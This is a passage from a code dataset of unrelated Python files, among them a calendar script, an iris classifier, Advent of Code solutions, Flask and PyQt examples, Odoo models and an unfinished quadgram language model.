The 'datetime'\n module may be helpful for this.\n - If the user specifies one argument, assume they passed in a\n month and render the calendar for that month of the current year.\n - If the user specifies two arguments, assume they passed in\n both the month and the year. Render the calendar for that\n month and year.\n - Otherwise, print a usage statement to the terminal indicating\n the format that your program expects arguments to be given.\n Then exit the program.\n\"\"\"\n\nimport sys\nimport calendar\nfrom datetime import datetime\n\n# Ensures arguments are formatted correctly based on string length\ndef argCheck(arg1, arg2):\n\n if( len( arg1 ) > 2 or len( arg2 ) > 4):\n return False\n\n else:\n return True\n\n# Generates a calendar based on number of inputs\ndef generate_calendar( input ):\n if input == 3:\n # Check Format\n if not argCheck( sys.argv[1], sys.argv[2] ):\n return \"Please enter format MM YYYY\"\n\n # Full User Input\n monthly = calendar.month( int( sys.argv[2] ), int( sys.argv[1] ), 2, 1 )\n return monthly\n\n elif input == 2 :\n #Check Format\n if not argCheck( sys.argv[1], \"2019\" ):\n return \"Please enter format MM YYYY\"\n\n # Default To This year\n year = datetime.today().year\n monthly = calendar.month( year, int( sys.argv[1] ), 2, 1 )\n return monthly\n\n else:\n # Default To Today\n year = datetime.today().year\n month = datetime.today().month\n\n monthly = calendar.month( year, month, 2, 1 )\n return monthly\n\n# Get arguments passed\nargLength = len( sys.argv )\n\nprint( generate_calendar( argLength ) )","sub_path":"src/14_cal.py","file_name":"14_cal.py","file_ext":"py","file_size_in_byte":1943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"325928050","text":"import sys\nn = int(input())\nlst = list(map(int, sys.stdin.readline().split()))\n\n# 리스트에서 제일 마지막 값을 뽑는다.\n\n\ndef permutation(lst):\n temp = []\n standard = lst[-1]-1\n while lst:\n i = lst.pop()\n if standard < i:\n standard = i\n temp.append(i)\n else:\n lst.append(i)\n\n # temp에 들어있는 것 중 last 값보다는 큰 수중 가장 작은 수를 찾는다.\n # temp에 들어있는 수는 오름차순\n last = lst[-1]\n for lc, i in enumerate(temp):\n if last < i:\n lst[-1], temp[lc] = i, last\n break\n for i in temp:\n lst.append(i)\n return(lst)\n return -1\n\n\nresult = permutation(lst)\nif result == -1:\n print(result)\nelse:\n for i in result:\n print(i, end=' ')\n","sub_path":"10972.py","file_name":"10972.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"11740384","text":"import numpy as np\nimport matplotlib as mp\nimport matplotlib.pyplot as plt\nimport sklearn.neighbors as nb\nimport sklearn.metrics as metrics\nfrom sklearn import datasets\nfrom sklearn.model_selection import train_test_split,cross_val_score\n# 中文显示\nzhfont = mp.font_manager.FontProperties(fname=r\"C:\\\\WINDOWS\\\\Fonts\\\\simsun.ttc\", size=14) #宋体常规\n\n# 加载数据\niris = datasets.load_iris()\n\n# 构造样品数据\n\ntrain_data,test_data,train_label,test_label_expected = \\\n train_test_split(iris.data,iris.target,test_size=0.51,random_state=0)\n\n\n\n# 分析数据\n# 创建分类器\n#classifier = nb.KNeighborsClassifier(n_neighbors=3,weights='uniform',algorithm='auto')\nclassifier = nb.RadiusNeighborsClassifier(n_neighbors=2,weights='uniform',algorithm='auto')\n\n# 训练分类器\nclassifier.fit(train_data,train_label)\n\n# 预测\ntest_label_predicted = classifier.predict(test_data)\n# 交叉验证\nscores = cross_val_score(classifier,iris.data,iris.target,cv=10)\n\n# 
比较结果\nsize = len(test_label_predicted)\nouter = np.zeros((size),dtype=int)\nfor i in range(size):\n if test_label_expected[i] != test_label_predicted[i]:\n outer[i] = 1\nresult = np.vstack((test_label_expected,test_label_predicted,outer))\nresult = result.T\n\n# 计算正确率\n#classifier.score(test_data,test_label_expected)\nokresult = float(np.sum(outer==0)) / len(outer)\nprint(\"Classification report for classifier %s:\\n%s\\n\" % (classifier, metrics.classification_report(test_label_expected, test_label_predicted)))\n#result = np.concatenate((test_label_expected,test_label_predicted,outer),axis=1)\n\n#绘制图形\nplt.plot(outer,'*')\nplt.xlabel(u\"样板编号\",fontproperties=zhfont)\nplt.ylabel(u'y=0 正确分类 或 y= 1 分类错误',fontproperties=zhfont)\nplt.title(u'分类正确',fontproperties=zhfont)\nplt.show()","sub_path":"working/dataAnalysisCrossValidation.py","file_name":"dataAnalysisCrossValidation.py","file_ext":"py","file_size_in_byte":1829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"605592535","text":"from collections import namedtuple\n\nSTATE_PREFIX = \"java.lang.Thread.State: \"\n\nThreadInfo = namedtuple('ThreadInfo', 'frames is_edt thread_state')\nDumpFileInfo = namedtuple('DumpFileInfo', 'thread_infos')\n\n\ndef get_info(self):\n return next((i for i in self.thread_infos if i.is_edt), None)\n\n\nsetattr(DumpFileInfo, 'get_edt_info', get_info)\n\n\ndef split_into_threads(lines):\n \"\"\"\n :type lines: list(str)\n :param lines:\n :return: list(list(str))\n \"\"\"\n start_indices = [i - 1 for i, s in enumerate(lines) if STATE_PREFIX in s]\n start_indices.append(len(lines))\n if len(start_indices) < 2:\n return []\n return [lines[begin:end] for begin, end in zip(start_indices[:-1], start_indices[1:])]\n\n\ndef parse_thread_info(thread):\n \"\"\"\n :type thread: list(str)\n :param thread: processed thread\n :return: Optional(ThreadInfo)\n \"\"\"\n if len(thread) <= 3 or STATE_PREFIX not in thread[1]:\n return None\n\n is_edt = \"AWT-EventQueue\" in thread[0]\n thread_state = thread[1].strip().replace(STATE_PREFIX, \"\")\n return ThreadInfo(thread, is_edt, thread_state)\n\n\ndef parse_dump_file(lines):\n \"\"\"\n :type lines: list(str)\n :param lines:\n :return: Optional(DumpFileInfo)\n \"\"\"\n infos = [info for info in (parse_thread_info(thread) for thread in split_into_threads(lines)) if info is not None]\n return DumpFileInfo(infos) or None\n","sub_path":"dump_file.py","file_name":"dump_file.py","file_ext":"py","file_size_in_byte":1390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"354741401","text":"#This Script Contains Parameter Required for Reliablity Testcase \n#List of Python Library Required\n\nimport time\nfrom datetime import *\nimport os\nimport sys\nimport logging\nimport shutil \n\n#ETC Ports\nETC_UART0 = 0\nETC_UART1 = 1\nETC_UART2 = 2\nETC_UART3 = 3\n\n#ETC UART Baud Rate\nETC_UART_BAUD = 921600\n\n#Random Burst Size Enable\nrad=False \nFETL=False\nFULL_DUPLEX = True\n\nSTC_TR_SIZE = ['1000']\nPacket_Size = ['10M','1M','100K']\n\nTPS_Voltage = [1.1,1.045,1.155]\nTemp_C= ['S25']\n\n#Voltage TPS Calculation \nTPS_Values=[]\nfor i in TPS_Voltage:\n\tTPS_Values += hex(int((i+0.60)/0.01))[2:] +'00',\n\t","sub_path":"Python_Practice/Power_On_Off/source_code/reliablity_header.py","file_name":"reliablity_header.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"268692613","text":"import 
matplotlib.pyplot as plt\nimport matplotlib as mpl\nimport numpy as np\n\ndef f(x):\n return (x+2)*x*(x-1)\n\n\nx = np.linspace(-2.5,2.5,100,endpoint=True)\ny = f(x)\n\n\nfig, ax = plt.subplots()\n\nax.spines['left'].set_position('center')\nax.spines['bottom'].set_position('zero')\n\n# Eliminate upper and right axes\nax.spines['right'].set_color('none')\nax.spines['top'].set_color('none')\n\n# Show ticks in the left and lower axes only\nax.xaxis.set_ticks_position('bottom')\nax.yaxis.set_ticks_position('left')\n\n\n\n#xticks = ax.xaxis.get_major_ticks() \n#xticks[3].label1.set_visible(False)\n\nyticks = ax.yaxis.get_major_ticks() \nyticks[2].label1.set_visible(False)\n\nplt.plot(x,y, 'k')\n\nplt.plot(-1.215,2.113,'ro') \nplt.plot(0.549,-0.631,'ro') \n\n\n\nplt.savefig('cubic.png', transparent=True)\nplt.show()","sub_path":"Figure generator code/figure_min.py","file_name":"figure_min.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"442369774","text":"#!/usr/bin/env python\nimport sys\nfrom hashlib import md5\nfrom itertools import count\n\nc1 = c2 = 8\nt1 = \"\"\nt2 = [\" \"] * c2\n\nfor i in count(1):\n hash = md5((sys.argv[1] + str(i)).encode(\"ascii\")).hexdigest()\n if hash[:5] == \"00000\":\n if c1 > 0:\n c1 -= 1\n t1 += hash[5]\n\n if c2 > 0 and hash[5].isdigit():\n j = int(hash[5])\n if 0 <= j < len(t2) and t2[j] == \" \":\n c2 -= 1\n t2[j] = hash[6]\n\n if c1 <= 0 and c2 <= 0:\n break\n\nprint(t1)\nprint(\"\".join(t2))\n","sub_path":"2016/05.py","file_name":"05.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"234056731","text":"import time\nfrom collections import defaultdict\n\nstart_time = time.time()\n\nf = open('names_1.txt', 'r')\nnames_1 = f.read().split(\"\\n\") # List containing 10000 names\nf.close()\n\nf = open('names_2.txt', 'r')\nnames_2 = f.read().split(\"\\n\") # List containing 10000 names\nf.close()\n\njoin_names = names_1 + names_2\ncache = defaultdict(int)\nduplicates = []\n\nfor name in names_1:\n cache[name] += 1\nfor name in names_2:\n if cache[name]:\n duplicates.append(name)\n\n \nend_time = time.time()\nprint (f\"{len(duplicates)} duplicates:\\n\\n{', '.join(duplicates)}\\n\\n\")\nprint (f\"runtime: {end_time - start_time} seconds\")\n\n","sub_path":"names/names.py","file_name":"names.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"481614340","text":"#! 
/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\n'''\n按照扑克牌的规则,现在有6张牌,只要5张\n黑桃(S)红桃(H)方块(D)梅花(C)\n牌:2.3.4.5.6.7.8.9.10.J.Q.K.A\n数据库存的是下面格式的数据,写脚本验证满足3带2的牌型\n[''D1'' , ''H1'' , ''H10'' , ''H7'' , ''S1'' , ''S7'']\n[\"C9\" , \"D6\" , \"D9\" , \"H13\" , \"H9\" , \"S7\"]\n[\"C2\" , \"D13\" , \"D2\" , \"H2\" , \"H9\" , \"S13\"]\n'''\n# a = '''[''D1'' , ''H1'' , ''H10'' , ''H7'' , ''S1'' , ''S7'']'''\n# # #字符串的替换\n# a = a.replace(\"''\",'\"')\n# #字符串截取\n# a = a[2:-2]\n#\n# print(a)\n#\n# #字符串的切片方法\n#\n# b = a.split('\" , \"')\n#\n# print(b)\n#\n# #key 唯一;并且存一对数据\n# #key存牌的大小,value存key出现的次数\n# #{'1':3,\"10\":1,\"7\":2}\n# d={}\n# for i in b:\n# c = i[1:]\n# if(c in d ):\n# d[c] +=1\n# else:\n# d[c] =1\n# print(d)\n# bool2 = False # 字典KEY的值为2的时候为True\n# bool3 = False # 字典KEY的值为3的时候为True\n# for key in d:\n# if(d[key]==3):\n# bool3 = True\n# if(d[key]==2):\n# bool2 = True\n# if(bool2 and bool3):\n# print(\"可以三带二\")\n# else:\n# print(\"不可以\")\n# m='''[\"C9\" , \"D6\" , \"D9\" , \"H13\" , \"H9\" , \"S7\"]'''\n# m=m[2:-2]\n# c=m.split('\" , \"')\n# print(c)\n\n\n#def是方法定义的关键字,juge_3_2()方法名,可自定义不可以数字开头,\ndef juge_3_2(a):\n #第一步:统一符号 对字符串的处理,用replace()\n #a='''[''D1'' , ''H1'' , ''H10'' , ''H7'' , ''S1'' , ''S7'']'''\n #a= input(\"请输入牌型:\")\n a=a.replace(\"''\",'\"')\n #print(a)\n # 第二步:去掉中括号 字符串截取 [::]\n a=a[2:-2]\n # 第三步:变成list 字符串切片 .split() 新建一个list变量\n b=a.split('\" , \"')\n #print(b)\n # 第四步:取出后面的数字 循环遍历取出list里面的每个值,对这个值进行截取\n #for key in b:\n #print(key[1:])\n # 第五步:统计相同的数字个数 用字典去统计\n d={}\n for c in b:\n y=c[1:]\n if y in d:\n d[y] += 1\n else:\n d[y] =1\n print(d)\n # 第六步:判断数据中有没有同时存在三��相同数字和两个相同数字 if判断\n m1=0#字典KEY的值为2的时候为1\n m2=0#字典KEY的值为3的时候为1\n for key in d:\n if(d[key] == 2):\n m1=1\n if(d[key] == 3):\n m2=1\n if(m1==1 and m2==1):\n print(\"3带2\")\n else:\n print(\"不可3带2\")\n\n\n# for i in range(3):\n# juge_3_2(i)\n# with open(\"D:\\\\software data\\\\pycharm\\\\gy-1906-1\\\\demo\\\\day04\\\\cards.txt\",'r') as h:\n# x=h.readlines()\n# for e in x:\n# e=e.replace(\"\\n\",'')\n# print(e)\n# juge_3_2(e)\n#\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nwith open(\"cards.txt\",'r')as m:\n line=m.readlines()\n for lines in line:\n lines=lines.replace(\"\\n\",'')\n print(lines)\n juge_3_2(lines)\n","sub_path":"demo/day04/practice.py","file_name":"practice.py","file_ext":"py","file_size_in_byte":2949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"622989046","text":"def num_common_letters(goal_word, guess):\n goal = get_string(goal_word)\n guess = get_string(guess)\n k = 0\n for i in range(len(guess)):\n if guess[i] in goal:\n if i == 0:\n k += 1\n elif guess[i] not in guess[0:i]:\n k += 1\n else:\n k = k\n return k\n","sub_path":"assignments/python/61a_hw4/code/39.py","file_name":"39.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"496708485","text":"from flask import Flask, render_template, jsonify\nimport database\n\napp = Flask(__name__)\n\n\n@app.route('/status', methods=['GET'])\ndef status():\n try:\n import database\n database.test()\n return jsonify(status='Success')\n except Exception as e:\n return jsonify(status='Failed', error=str(e))\n\n\n@app.route(\"/\", defaults={\"path\": \"\"})\n@app.route(\"/\")\ndef index(path):\n return render_template('index.html')\n\n\nif __name__ == \"__main__\":\n 
app.run(debug=True)\n","sub_path":"webapp-quickbuild/builder/starter/flask/flask_starter.py","file_name":"flask_starter.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"371482042","text":"\"\"\"\n\n\"\"\"\nimport astropy.units as u\nimport numpy as np\nimport h5py\n\n# FOXSI-R Constants\nFOCAL_LENGTH = 2 * u.m\nPIXEL_NUMBER = 128\nSTRIP_PITCH = {'cdte': 60 * u.micron, 'si': 75 * u.micron}\n\n# CCD Parameters\nCCD_PIXEL_PITCH = 13.5 * u.micron\n\nHDF_CCD_FILE = '/Users/schriste/Documents/FOXSI-R/Optics PSF Calibration/foxsi2_ccd_corrected.hdf5'\n\nprint(\"Loading file {0}\".format(HDF_CCD_FILE))\nhdf_ccd = h5py.File(HDF_CCD_FILE, 'r+')\nccd_images = hdf_ccd['X2/ccd_images']\nccd_polar_angles = u.Quantity(hdf_ccd['meta/polar_angle'][...], hdf_ccd['meta/polar_angle'].attrs['units'])\nccd_offaxis_angles = u.Quantity(hdf_ccd['meta/offaxis_angle'][...], hdf_ccd['meta/offaxis_angle'].attrs['units'])\nccd_nimages = ccd_images.shape[0]\n\n\n@u.quantity_input(pixel_pitch=u.mm)\ndef plate_scale(pixel_pitch):\n \"\"\"Given a pixel pitch provide the plate scale.\"\"\"\n return np.arctan(pixel_pitch / FOCAL_LENGTH).to(u.arcsec)","sub_path":"foxsi_optics_calib/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"410917381","text":"from PyQt5.QtWidgets import QApplication, QDialog, QPushButton, QHBoxLayout, QGroupBox, QVBoxLayout\nimport sys\nfrom PyQt5 import QtGui\nfrom PyQt5.QtCore import QRect\nfrom PyQt5 import QtCore\n\n\nclass Window(QDialog):\n def __init__(self):\n super().__init__()\n\n self.title = \"HBox Layout\"\n self.top = 200\n self.left = 400\n self.width = 400\n self.height = 100\n self.iconName = \"icon.png\"\n\n self.InitWindow()\n\n def InitWindow(self):\n self.setWindowIcon(QtGui.QIcon(self.iconName))\n self.setWindowTitle(self.title)\n self.setGeometry(self.left, self.top, self.width, self.height)\n\n self.CreateLayout()\n\n vbox = QVBoxLayout()\n vbox.addWidget(self.groupBox)\n self.setLayout(vbox)\n\n self.show()\n\n def CreateLayout(self):\n self.groupBox = QGroupBox(\"What Is Your Favorite Programming Language ?\")\n hboxLayout = QHBoxLayout()\n\n self.button = QPushButton(\"Football\", self)\n self.button.setIcon(QtGui.QIcon(\"football.png\"))\n self.button.setIconSize(QtCore.QSize(40, 40))\n self.button.setMinimumHeight(40)\n hboxLayout.addWidget(self.button)\n\n self.button2 = QPushButton(\"Cricket\", self)\n self.button2.setIcon(QtGui.QIcon(\"cricket.png\"))\n self.button2.setIconSize(QtCore.QSize(40, 40))\n self.button2.setMinimumHeight(40)\n hboxLayout.addWidget(self.button2)\n\n self.button3 = QPushButton(\"Tennis\", self)\n self.button3.setIcon(QtGui.QIcon(\"tennis.png\"))\n self.button3.setIconSize(QtCore.QSize(40, 40))\n self.button3.setMinimumHeight(40)\n hboxLayout.addWidget(self.button3)\n\n self.groupBox.setLayout(hboxLayout)\n\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n window = Window()\n sys.exit(app.exec())\n","sub_path":"Examples/VHLayout.py","file_name":"VHLayout.py","file_ext":"py","file_size_in_byte":1848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"330992040","text":"\"\"\"\nThis module contains the declaration of variables for different HTTP status\ncodes that neither Flask nor Flask-RESTful includes.\n\nThis module will help in the readability of 
the code as contains a descriptive\nHTTP status codes.\n\"\"\"\nfrom enum import Enum\n\nclass HttpStatus(Enum):\n \"\"\"Represents different and unique sets of HTTP status codes\n names and values.\"\"\"\n continue_100 = 100\n switching_protocols_101 = 101\n ok_200 = 200\n created_201 = 201\n accepted_202 = 202\n non_authoritative_information_203 = 203\n no_content_204 = 204\n reset_content_205 = 205\n partial_content_206 = 206\n multiple_choices_300 = 300\n moved_permanently_301 = 301\n found_302 = 302\n see_other_303 = 303\n not_modified_304 = 304\n use_proxy_305 = 305\n reserved_306 = 306\n temporary_redirect_307 = 307\n bad_request_400 = 400\n unauthorized_401 = 401\n payment_required_402 = 402\n forbidden_403 = 403\n not_found_404 = 404\n method_not_allowed_405 = 405\n not_acceptable_406 = 406\n proxy_authentication_required_407 = 407\n request_timetout_408 = 408\n conflict_409 = 409\n gone_410 = 410\n length_required_411 = 411\n precondition_failed_412 = 412\n request_entity_too_large_413 = 413\n request_uri_too_long_414 = 414\n unsupported_media_type_415 = 415\n requested_range_not_satisfiable_416 = 416\n expectation_failed_417 = 417\n precondition_required_428 = 428\n too_many_requests_429 = 429\n request_header_fields_too_large_431 = 431\n unavailable_for_legal_reasons_451 = 451\n internal_server_error_500 = 500\n not_implemented_501 = 501\n bad_gateway_502 = 502\n service_unavailable_503 = 503\n gateway_timeout_504 = 504\n http_version_not_supported_505 = 505\n network_authentication_required_511 = 511\n\n @staticmethod\n def is_informational(cls, status_code):\n return 100 <= status_code.value <= 199\n\n @staticmethod\n def is_success(status_code):\n return 200 <= status_code.value <= 299\n\n @staticmethod\n def is_redirect(status_code):\n return 300 <= status_code.value <= 399\n\n @staticmethod\n def is_client_error(status_code):\n return 400 <= status_code.value <= 499\n\n @staticmethod\n def is_server_error(status_code):\n return 500 <= status_code.value <= 599\n","sub_path":"simple-in-memory-dictionary-data-source/service/http_status.py","file_name":"http_status.py","file_ext":"py","file_size_in_byte":2316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"176096436","text":"from fileinput import input as finput\nfrom collections import deque\nfrom itertools import islice\n\ndef parse(deck):\n q = deque()\n for line in deck.splitlines():\n try:\n i = int(line)\n q.append(int(line))\n except:\n k = line[:-1] \n return k, q\n\nfi = \"\".join(finput())\ndecks = dict([parse(deck) for deck in fi.split(\"\\n\\n\")])\n\ndef combat(decks):\n p1 = decks[\"Player 1\"]\n p2 = decks[\"Player 2\"]\n while p1 and p2:\n p1c = p1.popleft() \n p2c = p2.popleft()\n if p1c > p2c:\n p1.append(p1c) \n p1.append(p2c)\n else:\n p2.append(p2c)\n p2.append(p1c)\n return (\"Player 1\", p1) if p1 else (\"Player 2\", p2)\n\ndef score(deck):\n s = 0\n for i, n in enumerate(reversed(deck), 1):\n s += n * i\n return s\n\ndef part1(decks):\n _, deck = combat(decks)\n return score(deck)\n\ndef tuplify(p1, p2):\n return tuple(p1) + (\"_\",) + tuple(p2)\n\ndef qslice(q, start, end):\n return deque(islice(q, start, end))\n\ndef recursive_combat(p1, p2):\n used = set()\n while p1 and p2:\n t = tuplify(p1, p2)\n if t in used:\n return 1, p1\n used.add(t)\n p1c = p1.popleft()\n p2c = p2.popleft()\n if len(p1) >= p1c and len(p2) >= p2c:\n p1s = qslice(p1, 0, p1c)\n p2s = qslice(p2, 0, p2c)\n winner, _ = recursive_combat(p1s, p2s)\n else:\n winner = 1 if p1c > 
p2c else 2 \n if winner == 1: \n p1.append(p1c)\n p1.append(p2c)\n else:\n p2.append(p2c)\n p2.append(p1c)\n if len(p1) > 0:\n return 1, p1\n return 2, p2\n \ndef part2(decks):\n p1 = decks[\"Player 1\"]\n p2 = decks[\"Player 2\"]\n _, deck = recursive_combat(p1, p2)\n return score(deck)\n\n\n\n","sub_path":"22/sol.py","file_name":"sol.py","file_ext":"py","file_size_in_byte":1839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"583377487","text":"from odoo import api, fields, models\nfrom odoo.addons import decimal_precision as dp\n\n\nclass ProductProduct(models.Model):\n _inherit = 'product.product'\n\n option = fields.Float(string=\"Option\")\n moh = fields.Float(string=\"MOH(%)\")\n boh = fields.Float(string=\"BOH(%)\")\n # product_file = fields.Binary()\n # product_doc = fields.Binary(string=\"Product Document\",attachment=True,store=True)\n # filename = fields.Char(\"filename\",store=True)\n # presale_ids = fields.Many2many('res.users', 'presale_user', 'order_id', 'user_id', string='PreSales',domain=lambda self:self._display_presale_saleorder())\n lst_price = fields.Float(\n 'Sale Price', compute='_compute_product_lst_price',default=1.0,\n digits=dp.get_precision('Product Price'), inverse='_set_product_lst_price',\n help=\"The sale price is managed from the product template. Click on the 'Variant Prices' button to set the extra attribute prices.\")\n\n\nclass ProductTemplate(models.Model):\n _inherit = \"product.template\"\n product_file = fields.Binary(string=\"Upload Product File\")\n filename = fields.Char(\"filename\",store=True)\n qbom_ids = fields.One2many('quotation.bom', 'product_tmpl_id')\n option = fields.Float(\n string=\"Option\", compute=\"_compute_option\", store=True, readonly=False)\n moh = fields.Float(string=\"MOH(%)\", compute=\"_compute_moh\",\n store=True, readonly=False)\n boh = fields.Float(string=\"BOH(%)\", compute=\"_compute_boh\",\n store=True, readonly=False)\n product_doc = fields.Binary(string=\"Product Document\",attachment=True)\n filename = fields.Char(\"filename\")\n product_label = fields.Many2many('product.label','product_label_rel','product_id','label_id',string=\"Labels\")\n type = fields.Selection(selection_add=[('product', 'Stockable Product')],default='product')\n @api.depends('product_variant_ids', 'product_variant_ids.boh')\n def _compute_boh(self):\n unique_variants = self.filtered(\n lambda template: len(template.product_variant_ids) == 1)\n for template in unique_variants:\n template.boh = template.product_variant_ids.boh\n for template in (self - unique_variants):\n template.boh = 0.0\n\n @api.depends('product_variant_ids', 'product_variant_ids.moh')\n def _compute_moh(self):\n unique_variants = self.filtered(\n lambda template: len(template.product_variant_ids) == 1)\n for template in unique_variants:\n template.moh = template.product_variant_ids.moh\n for template in (self - unique_variants):\n template.moh = 0.0\n\n @api.depends('product_variant_ids', 'product_variant_ids.option')\n def _compute_option(self):\n unique_variants = self.filtered(\n lambda template: len(template.product_variant_ids) == 1)\n for template in unique_variants:\n template.option = template.product_variant_ids.option\n for template in (self - unique_variants):\n template.option = 0.0\n","sub_path":"quotation_bom/models/product_product.py","file_name":"product_product.py","file_ext":"py","file_size_in_byte":3037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} 
+{"seq_id":"425605666","text":"# Load required libraries\nimport matplotlib\nmatplotlib.use('Agg')  # non-interactive backend; must be selected before importing pyplot\nfrom matplotlib import pyplot as plt\nimport seaborn as sns\nimport pandas as pd\nimport numpy as np\n\n# Set figure display options\nsns.set(context='notebook', style='darkgrid')\nsns.set(font_scale=1.4)\n\ndef construct_graph(scaled_meta_features, coefficients, top_project_std):\n    \"\"\"Constructs and saves a plot displaying the weighted scores of the user's\n    project compared to the weighted scores of the average project from the top\n    5% of projects\n    \n    Args:\n        scaled_meta_features (ndarray): a NumPy array containing the values of the\n            19 meta features standardized by the scaler trained on the training\n            set\n        coefficients (ndarray): a NumPy array containing the weights of the \n            trained model\n        top_project_std (ndarray): a NumPy array containing the values of the 19\n            features from the average project from the top 5%, standardized by the\n            scaler trained on the training set\n    \n    Returns:\n        Nothing\"\"\"\n\n    # List of meta features\n    features = ['num_sents', 'num_words', 'num_all_caps', 'percent_all_caps',\n                'num_exclms', 'percent_exclms', 'num_apple_words',\n                'percent_apple_words', 'avg_words_per_sent', 'num_paragraphs',\n                'avg_sents_per_paragraph', 'avg_words_per_paragraph',\n                'num_images', 'num_videos', 'num_youtubes', 'num_gifs',\n                'num_hyperlinks', 'num_bolded', 'percent_bolded']\n    \n    # Compute feature importances of the meta features\n    feature_ranks = pd.Series(\n        coefficients[:len(features)],\n        index=features\n    )\n    \n    # List of meta features that were most predictive of funded projects\n    predictive_features = ['num_hyperlinks', 'num_images', 'num_apple_words',\n                           'num_exclms', 'percent_bolded', 'num_words']\n\n    # Transform the standardized feature vector into a Series\n    feature_vector_std = pd.Series(scaled_meta_features.ravel(), index=features)\n\n    # Compute the weighted score of the meta features of the user's project\n    user_project_score = np.multiply(\n        feature_vector_std[predictive_features],\n        feature_ranks[predictive_features]\n    )\n\n    # Compute the weighted score of the meta features of the average top project\n    top_project_score = np.multiply(\n        top_project_std[predictive_features],\n        feature_ranks[predictive_features]\n    )\n\n    # Combine the weighted scores into a single DataFrame\n    messy = pd.DataFrame(\n        [user_project_score, top_project_score], \n        index=['Your project', 'Top projects']\n    ).T.reset_index()\n\n    # Transform the combined data into tidy format\n    tidy = pd.melt(\n        messy,\n        id_vars='index',\n        value_vars=['Your project', 'Top projects'],\n        var_name=' '\n    )\n\n    # Draw a grouped bar plot of the weighted scores, and remove axes labels and \n    # x-axis tick marks\n    fig = sns.factorplot(\n        data=tidy,\n        y='index',\n        x='value',\n        hue=' ',\n        kind='bar',\n        size=5,\n        aspect=1.5,\n        palette='Set1',\n        legend_out=False\n    ).set(\n        xlabel='score',\n        ylabel='',\n        xticks=[]\n    )\n\n    # Re-label the y-axis and re-position legend\n    labels = ['hyperlinks', 'images', 'innovation words', 'exclamation marks',\n              'bolded text', 'length of description']\n    plt.yticks(np.arange(6), labels)\n    fig.ax.legend(loc='lower right')\n\n    # Save the figure\n    plt.savefig(\n        'flaskexample/static/images/figure.png',\n        dpi=300,\n        bbox_inches='tight'\n    
)","sub_path":"application/prediction_results.py","file_name":"prediction_results.py","file_ext":"py","file_size_in_byte":3709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
+{"seq_id":"616415358","text":"from creative_ai.utils.print_helpers import ppGramJson\n\nclass QuadgramModel():\n\n    def __init__(self):\n        \"\"\"\n        Requires: nothing\n        Modifies: self (this instance of the NGramModel object)\n        Effects:  This is the NGramModel constructor. It sets up an empty\n                  dictionary as a member variable.\n\n        This function is done for you.\n        \"\"\"\n\n        self.nGramCounts = {}\n\n    def __str__(self):\n        \"\"\"\n        Requires: nothing\n        Modifies: nothing\n        Effects:  Returns the string to print when you call print on an\n                  NGramModel object. This string will be formatted in JSON\n                  and display the currently trained dataset.\n\n        This function is done for you.\n        \"\"\"\n\n        return ppGramJson(self.nGramCounts)\n\n\n###############################################################################\n# Begin Core >> FOR CORE IMPLEMENTATION, DO NOT EDIT ABOVE THIS SECTION <<\n###############################################################################\n\n    def trainModel(self, text):\n        \"\"\"\n        Requires: text is a list of lists of strings\n        Modifies: self.nGramCounts, a four-dimensional dictionary. For\n                  examples and pictures of the (one level shallower)\n                  TrigramModel version of self.nGramCounts, see the spec.\n        Effects:  this function populates the self.nGramCounts dictionary,\n                  which has strings as keys and dictionaries as values,\n                  where those inner dictionaries again map strings to\n                  dictionaries, whose values are {string: integer} pairs.\n                  Returns self.nGramCounts\n        \"\"\"\n        # Iterates through each sentence in text\n        for sentence in text:\n            # Iterates over each quadgram start position\n            for i in range(len(sentence) - 3):\n                # Updates the quadgram counts for the four consecutive tokens\n                w1, w2, w3, w4 = sentence[i:i + 4]\n                counts = self.nGramCounts.setdefault(w1, {}).setdefault(\n                    w2, {}).setdefault(w3, {})\n                counts[w4] = counts.get(w4, 0) + 1\n\n        return self.nGramCounts\n\n    def trainingDataHasNGram(self, sentence):\n        \"\"\"\n        Requires: sentence is a list of strings\n        Modifies: nothing\n        Effects:  returns True if this n-gram model can be used to choose\n                  the next token for the sentence. For explanations of how this\n                  is determined for the TrigramModel, see the spec.\n        \"\"\"\n        # Checks if sentence consists of 3 or more words\n        if len(sentence) > 2:\n            # Returns True if the last three words start a known quadgram\n            if sentence[-3] in self.nGramCounts:\n                if sentence[-2] in self.nGramCounts[sentence[-3]]:\n                    if sentence[-1] in self.nGramCounts[sentence[-3]][sentence[-2]]:\n                        return True\n        return False\n\n\n    def getCandidateDictionary(self, 